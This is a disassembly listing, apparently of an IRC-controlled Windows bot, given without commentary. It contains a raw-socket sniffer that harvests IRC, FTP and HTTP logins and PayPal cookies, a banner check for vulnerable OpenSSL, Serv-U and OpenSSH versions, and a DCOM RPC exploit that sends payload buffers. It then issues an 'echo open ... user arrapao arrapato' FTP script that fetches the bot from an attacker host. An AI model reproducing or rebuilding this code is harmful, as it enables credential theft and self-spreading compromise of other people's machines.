; sub_402B92+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_402BAC: ; CODE XREF: sub_402B92+14�j
push offset aSodoma_3 ; "##sodoma_3"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BA8
push offset aPsniff_2 ; "[PSNIFF]:"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BA8
push offset aPsniff_1 ; "PSNIFF//"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BA8
push offset aJoin ; "JOIN #"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402BF4
loc_402BF0: ; CODE XREF: sub_402B92+71�j
; sub_402B92+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402B92+5C�j
push offset a302 ; "302 "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BF0
push offset a366 ; "366 "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BF0
push offset a_login_0 ; ":.login"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BF0
push offset aLogin_0 ; ":!login"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BF0
push offset aLogin ; ":!Login"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BF0
push offset a_login ; ":.Login"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BF0
push offset a_ident ; ":.ident"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402BF0
push offset aIdent ; ":!ident"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz loc_402BF0
push offset a_hashin ; ":.hashin"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz loc_402BF0
push offset aHashin ; ":!hashin"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_402B92 endp
; =============== S U B R O U T I N E =======================================
sub_402CA9 proc near ; CODE XREF: sub_402E92+2F1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aIrcSniff ; "IRC sniff"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402CC3
loc_402CBF: ; CODE XREF: sub_402CA9+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_402CC3: ; CODE XREF: sub_402CA9+14�j
push offset aSodoma_3 ; "##sodoma_3"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402CBF
push offset aOper_0 ; "OPER "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402CE9
loc_402CE5: ; CODE XREF: sub_402CA9+4F�j
; sub_402CA9+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_402CE9: ; CODE XREF: sub_402CA9+3A�j
push offset aNick_0 ; "NICK "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402CE5
push offset aOper ; "oper "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402CE5
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_402CA9 endp
; =============== S U B R O U T I N E =======================================
sub_402D1F proc near ; CODE XREF: sub_402E92+327�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aFtpSniff ; "FTP sniff"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402D39
loc_402D35: ; CODE XREF: sub_402D1F+29�j
; sub_402D1F+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_402D39: ; CODE XREF: sub_402D1F+14�j
push offset aSodoma_3 ; "##sodoma_3"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402D35
push offset aNick_0 ; "NICK "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402D35
push offset a220 ; "220 "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402D70
loc_402D6C: ; CODE XREF: sub_402D1F+60�j
; sub_402D1F+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_402D70: ; CODE XREF: sub_402D1F+4B�j
push offset a230 ; "230 "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402D6C
push offset aUser_2 ; "USER "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402D6C
push offset aPass_0 ; "PASS "
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_402D1F endp
; =============== S U B R O U T I N E =======================================
sub_402DA6 proc near ; CODE XREF: sub_402E92+358�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aHttpSniff ; "HTTP sniff"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402DC0
loc_402DBC: ; CODE XREF: sub_402DA6+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_402DC0: ; CODE XREF: sub_402DA6+14�j
push offset aSodoma_3 ; "##sodoma_3"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402DBC
push offset aPaypal ; "paypal"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402DE6
loc_402DE2: ; CODE XREF: sub_402DA6+4F�j
; sub_402DA6+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_402DE6: ; CODE XREF: sub_402DA6+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402DE2
push offset aPaypal_com_0 ; "PAYPAL.COM"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402DE2
push offset aPaypal_com ; "paypal.com"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402DE2
push offset aSetCookie ; "Set-Cookie:"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_402DA6 endp
; =============== S U B R O U T I N E =======================================
sub_402E2D proc near ; CODE XREF: sub_402E92:loc_403250�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aVulnSniff ; "VULN sniff"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402E47
loc_402E43: ; CODE XREF: sub_402E2D+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_402E47: ; CODE XREF: sub_402E2D+14�j
push offset aSodoma_3 ; "##sodoma_3"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402E43
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_402E6D
loc_402E69: ; CODE XREF: sub_402E2D+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_402E6D: ; CODE XREF: sub_402E2D+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
jnz short loc_402E69
push offset aOpenssh_2 ; "OpenSSH_2"
push esi
call sub_417980
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_402E2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E92 proc near ; DATA XREF: sub_40F6F1+1FCB�o
var_113B8 = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
var_1138C = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
var_2B8 = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call sub_417B70
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_3B7]
push 3Fh
mov [eax+90h], esi
pop ecx
xor eax, eax
mov [ebp+var_3B8], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_3B8]
mov [ebp+var_20], 2
push eax
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call dword_4413CC ; gethostname
lea eax, [ebp+var_3B8]
push eax
call dword_44143C ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_8]
push eax
call sub_417490
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call dword_441438 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_402F38
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_402F38: ; CODE XREF: sub_402E92+9B�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_4413E4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_402FA7
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_424D58
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_402F8A
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_40DC10
add esp, 14h
loc_402F8A: ; CODE XREF: sub_402E92+D6�j
lea eax, [ebp+var_2B8]
push eax
call sub_40C4F7
push [ebp+var_34]
call sub_417174
pop ecx
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_402FA7: ; CODE XREF: sub_402E92+B6�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_C], esi
call dword_441364 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_40302D
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_424D10
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_403009
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_40DC10
add esp, 14h
loc_403009: ; CODE XREF: sub_402E92+155�j
lea eax, [ebp+var_2B8]
push eax
call sub_40C4F7
pop ecx
push edi
call dword_441450 ; closesocket
push [ebp+var_34]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_40302D: ; CODE XREF: sub_402E92+135�j
mov esi, 200h
loc_403032: ; CODE XREF: sub_402E92+1CF�j
; sub_402E92+1F4�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_113B8]
push edi
push ebx
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_113B8]
push ebx
push edi
push eax
push [ebp+var_10]
call dword_4413D0 ; recv
cmp [ebp+var_113AF], 6
jnz short loc_403032
push [ebp+var_113A4]
mov edi, dword_4211F0
call edi ; ntohs
push [ebp+var_113A4+2]
movzx eax, ax
mov [ebp+arg_0], eax
call edi ; ntohs
cmp [ebp+arg_0], 6Eh
movzx edi, ax
jz short loc_403032
cmp [ebp+arg_0], 19h
jz short loc_403032
cmp edi, 6Eh
jz short loc_403032
cmp edi, 19h
jz short loc_403032
push [ebp+var_113AC]
call sub_402B83
pop ecx
push dword ptr [eax]
nop
call near ptr 71AB3F41h
push eax
lea eax, [ebp+var_13B8]
push offset dword_42433C
push eax
call sub_4173AC
push [ebp+var_113A8]
call sub_402B83
add esp, 10h
push dword ptr [eax]
nop
call near ptr 71AB3F41h
push eax
lea eax, [ebp+var_BB8]
push offset dword_42433C
push eax
call sub_4173AC
lea eax, [ebp+var_1138C]
mov [ebp+var_4], ebx
push eax
call sub_417AF0
add esp, 10h
test eax, eax
jle short loc_403130
loc_4030FC: ; CODE XREF: sub_402E92+29C�j
mov eax, [ebp+var_4]
cmp [ebp+eax+var_1138C], 0Dh
lea eax, [ebp+eax+var_1138C]
jnz short loc_403113
mov byte ptr [eax], 20h
loc_403113: ; CODE XREF: sub_402E92+27C�j
cmp byte ptr [eax], 0Ah
jnz short loc_40311B
mov byte ptr [eax], 20h
loc_40311B: ; CODE XREF: sub_402E92+284�j
inc [ebp+var_4]
lea eax, [ebp+var_1138C]
push eax
call sub_417AF0
cmp [ebp+var_4], eax
pop ecx
jl short loc_4030FC
loc_403130: ; CODE XREF: sub_402E92+268�j
cmp [ebp+arg_0], 50h
jz loc_4031E3
cmp edi, 50h
jz loc_4031E3
lea eax, [ebp+var_1138C]
push eax
call sub_402B92
test al, al
pop ecx
jz short loc_403177
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset dword_42505C
jmp loc_403212
; ---------------------------------------------------------------------------
loc_403177: ; CODE XREF: sub_402E92+2C0�j
cmp edi, 50h
jz short loc_4031E3
lea eax, [ebp+var_1138C]
push eax
call sub_402CA9
test al, al
pop ecx
jz short loc_4031AD
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_425018
jmp short loc_403212
; ---------------------------------------------------------------------------
loc_4031AD: ; CODE XREF: sub_402E92+2F9�j
cmp edi, 50h
jz short loc_4031E3
lea eax, [ebp+var_1138C]
push eax
call sub_402D1F
test al, al
pop ecx
jz short loc_4031E3
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_424FD4
jmp short loc_403212
; ---------------------------------------------------------------------------
loc_4031E3: ; CODE XREF: sub_402E92+2A2�j
; sub_402E92+2AB�j ...
lea eax, [ebp+var_1138C]
push eax
call sub_402DA6
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_403250
lea eax, [ebp+var_BB8]
push edi
push eax
lea eax, [ebp+var_13B8]
push [ebp+arg_0]
push eax
push offset unk_424F90
loc_403212: ; CODE XREF: sub_402E92+2E0�j
; sub_402E92+319�j ...
lea eax, [ebp+var_2B8]
push esi
push eax
call sub_41792A
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_403032
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_40DC10
add esp, 14h
jmp loc_403032
; ---------------------------------------------------------------------------
loc_403250: ; CODE XREF: sub_402E92+367�j
call sub_402E2D
test al, al
pop ecx
jz loc_403032
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_424F4C
jmp short loc_403212
sub_402E92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40327E proc near ; CODE XREF: sub_4033C9+440�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_14], 2
push eax
nop
call near ptr 71AB2BF4h
mov [ebp+var_10], eax
mov ax, word_425980
push eax
nop
call near ptr 71AB2B66h
push esi
push 1
push 2
mov [ebp+var_12], ax
nop
call near ptr 71AB3B91h
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_40339E
lea eax, [ebp+var_14]
push 10h
push eax
push edi
nop
call near ptr 71AB406Ah
cmp eax, 0FFFFFFFFh
jz loc_40339E
push esi
lea eax, [ebp+var_5A4]
push 400h
push eax
push edi
nop
call near ptr 71AB615Ah
mov esi, offset byte_42EDC4
mov ebx, 190h
push esi
push esi
push offset aArrapato ; "arrapato"
push offset aArrapao ; "arrapao"
push offset a4492 ; "4492"
push offset dword_515634
push offset aEchoOpenSDEqEc ; "echo open %s %d >> eq&echo user %s %s >"...
lea eax, [ebp+var_1A4]
push ebx
push eax
call sub_41792A
add esp, 24h
lea eax, [ebp+var_1A4]
push 0
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push edi
mov edi, dword_4211EC
call edi ; send
cmp eax, 0FFFFFFFFh
jz short loc_40339E
push 1F4h
nop
call near ptr 7C802442h
push esi
push offset dword_425A78
lea eax, [ebp+var_1A4]
push ebx
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_1A4]
push 0
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call edi ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4033A2
loc_40339E: ; CODE XREF: sub_40327E+54�j
; sub_40327E+6A�j ...
xor al, al
jmp short loc_4033C4
; ---------------------------------------------------------------------------
loc_4033A2: ; CODE XREF: sub_40327E+11E�j
push 0
lea eax, [ebp+var_5A4]
push 400h
push eax
push [ebp+var_4]
nop
call near ptr 71AB615Ah
push [ebp+var_4]
nop
call near ptr 71AB9639h
mov al, 1
loc_4033C4: ; CODE XREF: sub_40327E+122�j
pop edi
pop esi
pop ebx
leave
retn
sub_40327E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033C9 proc near ; CODE XREF: sub_40381E+11B�p
; sub_40381E+13D�p
var_89B0 = byte ptr -89B0h
var_8948 = byte ptr -8948h
var_68D8 = byte ptr -68D8h
var_6868 = byte ptr -6868h
var_5DA4 = byte ptr -5DA4h
var_4800 = byte ptr -4800h
var_47FF = byte ptr -47FFh
var_376C = byte ptr -376Ch
var_2CA8 = byte ptr -2CA8h
var_2CA7 = byte ptr -2CA7h
var_2CA4 = byte ptr -2CA4h
var_2C28 = byte ptr -2C28h
var_2458 = byte ptr -2458h
var_1FAD = byte ptr -1FADh
var_1CC0 = byte ptr -1CC0h
var_14DC = byte ptr -14DCh
var_14CC = byte ptr -14CCh
var_11A8 = byte ptr -11A8h
var_11A4 = byte ptr -11A4h
var_1198 = byte ptr -1198h
var_F10 = byte ptr -0F10h
var_E70 = byte ptr -0E70h
var_764 = dword ptr -764h
var_754 = byte ptr -754h
var_740 = byte ptr -740h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_B0 = byte ptr -0B0h
var_AD = byte ptr -0ADh
var_83 = byte ptr -83h
var_81 = byte ptr -81h
var_80 = byte ptr -80h
var_38 = byte ptr -38h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B0h
call sub_417B70
mov eax, dword_425AF8
push ebx
mov [ebp+var_10], eax
mov eax, dword_425AFC
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_38]
push offset loc_425AEC
push eax
call sub_4173AC
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_FF]
loc_403406: ; CODE XREF: sub_4033C9+4D�j
mov dl, [ebp+ecx+var_38]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_403406
push 60h
lea eax, [ebp+var_B0]
push offset dword_425590
push eax
call sub_417490
lea eax, [ebp+var_38]
push eax
call sub_417AF0
shl eax, 1
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
call sub_417490
add esp, 1Ch
lea eax, [ebp+var_38]
push 9
push (offset aC+3)
push eax
call sub_417AF0
pop ecx
lea eax, [ebp+eax*2+var_81]
push eax
call sub_417490
lea eax, [ebp+var_38]
push eax
call sub_417AF0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_AD]
push eax
call sub_417490
lea eax, [ebp+var_38]
push eax
call sub_417AF0
shl al, 1
add al, 9
push 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_83]
push eax
call sub_417490
mov ax, word_425980
add esp, 2Ch
push eax
nop
call near ptr 71AB2B66h
xor eax, 9999h
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_425290
call sub_417490
add esp, 0Ch
cmp [ebp+arg_C0], 0
jz loc_4035C0
mov edi, 0DACh
lea eax, [ebp+var_1CC0]
push edi
push 90h
push eax
call sub_417430
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea ebx, dword_4259C0[eax]
lea eax, [ebp+var_14DC]
push ebx
push eax
call sub_417490
mov esi, offset loc_4251E0
push esi
call sub_417AF0
push eax
lea eax, [ebp+var_14CC]
push esi
push eax
call sub_417490
push 4
lea eax, [ebp+var_11A8]
push offset loc_425AE4
push eax
call sub_417490
push 4
lea eax, [ebp+var_11A4]
push ebx
push eax
call sub_417490
add esp, 40h
push esi
call sub_417AF0
push eax
lea eax, [ebp+var_1198]
push esi
push eax
call sub_417490
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_47FF]
loc_403576: ; CODE XREF: sub_4033C9+1BF�j
mov dl, [ebp+ecx+var_1CC0]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_403576
and [ebp+var_2CA8], 0
and [ebp+var_2CA7], 0
mov esi, 1C52h
lea eax, [ebp+var_89B0]
push esi
push 31h
push eax
call sub_417430
push esi
lea eax, [ebp+var_68D8]
push 31h
push eax
call sub_417430
add esp, 18h
jmp short loc_403617
; ---------------------------------------------------------------------------
loc_4035C0: ; CODE XREF: sub_4033C9+115�j
push 7D0h
lea eax, [ebp+var_F10]
push 90h
push eax
call sub_417430
mov esi, offset loc_4251E0
push esi
call sub_417AF0
push eax
lea eax, [ebp+var_E70]
push esi
push eax
call sub_417490
lea eax, [ebp+var_10]
push eax
call sub_417AF0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_754]
push eax
call sub_417490
mov eax, dword_4259C0
add esp, 2Ch
mov [ebp+var_764], eax
loc_403617: ; CODE XREF: sub_4033C9+1F5�j
push 0E29h
lea eax, [ebp+var_2CA4]
push 31h
push eax
call sub_417430
movsx eax, [ebp+var_1]
add esp, 0Ch
add eax, 4
mov esi, dword_4211EC
push 0
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403658
loc_403651: ; CODE XREF: sub_4033C9+2C0�j
; sub_4033C9+2EB�j ...
xor al, al
jmp loc_403819
; ---------------------------------------------------------------------------
loc_403658: ; CODE XREF: sub_4033C9+286�j
mov edi, dword_4211E8
mov ebx, 640h
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
push 0
push 68h
push offset dword_4255F4
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_403651
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
push 0
push 0A0h
push offset dword_425660
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_403651
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
cmp [ebp+arg_C0], 0
jz loc_403784
push 68h
lea eax, [ebp+var_89B0]
push offset dword_425818
push eax
call sub_417490
lea eax, [ebp+var_4800]
push 1B5Ah
push eax
lea eax, [ebp+var_8948]
push eax
call sub_417490
push 70h
lea eax, [ebp+var_68D8]
push offset dword_425884
push eax
call sub_417490
lea eax, [ebp+var_376C]
push 0A5Eh
push eax
lea eax, [ebp+var_6868]
push eax
call sub_417490
push 84h
lea eax, [ebp+var_5DA4]
push offset dword_4258F8
push eax
call sub_417490
add esp, 3Ch
lea eax, [ebp+var_89B0]
push 0
push 10FCh
push eax
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_403651
push 0
lea eax, [ebp+var_740]
push ebx
push eax
push [ebp+arg_BC]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68D8]
jmp short loc_4037DC
; ---------------------------------------------------------------------------
loc_403784: ; CODE XREF: sub_4033C9+306�j
push 7Ch
lea eax, [ebp+var_2CA4]
push offset dword_425704
push eax
call sub_417490
lea eax, [ebp+var_F10]
push 7D0h
push eax
lea eax, [ebp+var_2C28]
push eax
call sub_417490
push 90h
lea eax, [ebp+var_2458]
push offset off_425784
push eax
call sub_417490
add esp, 24h
and [ebp+var_1FAD], 0
lea eax, [ebp+var_2CA4]
push 0
push 0CF8h
loc_4037DC: ; CODE XREF: sub_4033C9+3B9�j
push eax
push [ebp+arg_BC]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_403651
push 12Ch
nop
call near ptr 7C802442h
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40327E
add esp, 0BCh
test al, al
setnz al
loc_403819: ; CODE XREF: sub_4033C9+28A�j
pop edi
pop esi
pop ebx
leave
retn
sub_4033C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40381E proc near ; CODE XREF: ___:00404931�p
var_858 = byte ptr -858h
var_814 = byte ptr -814h
var_218 = byte ptr -218h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp+var_18]
push edi
push eax
mov [ebp+var_8], edi
call sub_417430
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_18], 2
push eax
nop
call near ptr 71AB2BF4h
push [ebp+arg_A0]
mov [ebp+var_14], eax
nop
call near ptr 71AB2B66h
push 6
push 1
push 2
mov [ebp+var_16], ax
nop
call near ptr 71AB3B91h
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jz loc_40391B
lea eax, [ebp+var_18]
push 10h
push eax
push esi
nop
call near ptr 71AB406Ah
cmp eax, 0FFFFFFFFh
jz loc_40391B
mov ebx, dword_4211EC
push edi
push 89h
push offset dword_425378
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_40391B
push edi
mov edi, 640h
lea eax, [ebp+var_858]
push edi
push eax
push esi
mov esi, dword_4211E8
call esi ; recv
push 0
push 0A8h
push offset dword_425404
push [ebp+var_4]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_40391B
push 0
lea eax, [ebp+var_858]
push edi
push eax
push [ebp+var_4]
call esi ; recv
push 0
push 0DEh
push offset dword_4254B0
push [ebp+var_4]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_40391B
mov ebx, [ebp+var_4]
push 0
lea eax, [ebp+var_858]
push edi
push eax
push ebx
call esi ; recv
movsx eax, [ebp+var_814]
sub eax, 30h
jz short loc_403926
dec eax
jz short loc_403922
loc_40391B: ; CODE XREF: sub_40381E+57�j
; sub_40381E+6D�j ...
xor eax, eax
jmp loc_4039E9
; ---------------------------------------------------------------------------
loc_403922: ; CODE XREF: sub_40381E+FB�j
push 0
jmp short loc_40394A
; ---------------------------------------------------------------------------
loc_403926: ; CODE XREF: sub_40381E+F8�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4033C9
add esp, 0C4h
test al, al
jnz short loc_40396A
push 1
loc_40394A: ; CODE XREF: sub_40381E+106�j
push ebx
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4033C9
add esp, 0C4h
test al, al
jz short loc_403971
loc_40396A: ; CODE XREF: sub_40381E+128�j
mov [ebp+var_8], 1
loc_403971: ; CODE XREF: sub_40381E+14A�j
push ebx
nop
call near ptr 71AB9639h
cmp [ebp+var_8], 0
jz short loc_4039E6
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset unk_425B00
lea eax, [ebp+var_218]
push 200h
push eax
call sub_41792A
push 0
lea eax, [ebp+var_218]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_40DC10
lea eax, [ebp+var_218]
push eax
call sub_40C4F7
mov eax, [ebp+arg_A8]
add esp, 2Ch
imul eax, 3Ch
inc dword_428C00[eax]
